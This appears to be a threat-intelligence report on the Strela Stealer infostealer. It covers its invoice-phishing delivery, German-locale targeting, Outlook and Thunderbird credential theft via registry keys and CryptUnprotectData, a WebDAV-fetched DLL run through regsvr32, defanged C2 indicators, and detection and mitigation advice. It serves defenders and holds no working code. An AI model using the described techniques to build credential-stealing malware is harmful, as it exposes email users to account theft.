Full Report
Infostealers have dominated the malware landscape due to the ease of threat operations maintenance, and a wide group of potential victims. In this blog, we take a closer look at a unique infostealer designed to precisely target a narrow data set on systems located in chosen geographic locations.
Analysis Summary
# Tool/Technique: Strela Stealer
## Overview
Strela Stealer (Cтрела, 'Arrow') is a highly focused infostealer malware variant designed to precisely target and exfiltrate email login credentials from Mozilla Thunderbird and Microsoft Outlook installations. It is known for leveraging sophisticated social engineering tactics, particularly phishing campaigns centered around fake invoices, and employing multi-layer obfuscation to complicate analysis.
## Technical Details
- Type: Malware family (Infostealer)
- Platform: Windows
- Capabilities: Email credential theft (Outlook/Thunderbird), system information gathering, geographic targeting, multi-stage execution via loaders.
- First Seen: Late 2022
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (via `wscript.exe`)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1055 - Process Injection (Implied via `regsvr32` execution technique)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Geographic Restriction:** Executes only on systems whose Language Code Identifier (LCID) matches specific German-speaking countries (Germany, Austria, Liechtenstein, Luxembourg, Switzerland).
- **Email Credential Theft:** Targets and decrypts IMAP user credentials (username, server, password) from Microsoft Outlook profile registry keys using `CryptUnprotectData`.
- **System Information Gathering:** Executes `systeminfo` and retrieves a list of installed applications using `SHGetKnownFolderItem`.
### Advanced Features
- **Multi-Stage Delivery:** Utilizes a JScript file executed via Windows Script Host (WScript) as the initial loader, which fetches a second-stage DLL payload from a C2 server using WebDAV.
- **Defense Evasion:** Employs custom multi-layer obfuscation and code-flow flattening in the DLL payload to hinder dynamic and static analysis.
- **Loader Sophistication:** Possible use of a specialized crypter known as ‘Stellar loader’.
- **In-Memory Execution:** The second-stage DLL payload is executed directly via `regsvr32` without being saved to disk (living off the land execution).
- **Decoy Document:** Downloads and displays a blurred PDF decoy after execution to mask the malicious activity.
- **C2 Communication:** Exfiltrates data by sending HTTP requests containing a host-unique identifier (Volume GUID of the system folder), pausing between read attempts using `Sleep()`.
## Indicators of Compromise
- File Hashes:
- SHA256: `f5c54fce6c9e2f84b084bbf9968c9a76d9cd74a11ccf4fcba29dbe2e4574e3d7` (JScript/Loader)
- SHA256: `9c49266e315eb76ce73cbe542cfd2bbf28844689944ac8776daecbdcdecd8cf8` (DLL Payload)
- SHA256: `31389cb2f067020f181462bab3519c22fd88da084012729e9edf79d15427b86f` (Additional sample hash)
- File Names:
- `1692630503222433608.js`
- `1909835116765.dll`
- Registry Keys (Searched for Outlook profiles):
- `HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676`
- `HKCU\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676`
- `HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676`
- Network Indicators:
- C2 IP: `193.143[.]1[.]205`
- URLs: `hxxp://193.143[.]1[.]205/invoice.php`, `hxxp://193.143[.]1[.]205/up.php`
- Behavioral Indicators:
- Execution of JScript via `wscript.exe`.
- Use of `regsvr32` to execute a DLL via its `DllRegisterServer` export.
- Querying system locale via LCIDs.
## Associated Threat Actors
- Hive0145 (Believed to be operated by a single threat actor)
## Detection Methods
- Signature-based detection: Hash matching for known samples.
- Behavioral detection: Monitoring for the execution chain starting with JScript launching via WSH, followed by `regsvr32` loading a recent file from a WebDAV source, especially when combined with attempts to read Outlook registry keys.
- YARA rules: Custom rules targeting the obfuscation techniques or specific decryption routine logic.
## Mitigation Strategies
- **Email Security:** Implement robust email filtering, specifically sandboxing attachments or blocking execution of JScript/VBScript files delivered via common archive formats (like ZIP).
- **Application Control:** Implement strict controls over execution of system utilities like `regsvr32` loading arbitrary DLLs from non-standard locations.
- **Network Monitoring:** Block or alert on traffic to known C2 infrastructure, especially bulletproof hosting providers like Proton66 OOO (AS 198953).
- **User Awareness:** Continual training highlighting invoice-themed social engineering attacks.
## Related Tools/Techniques
- Stellar loader (Potential specialized crypter used with Strela Stealer).
- Use of `regsvr32` for in-memory DLL execution (similar to DotNetToJuice or other LOLBins abuse).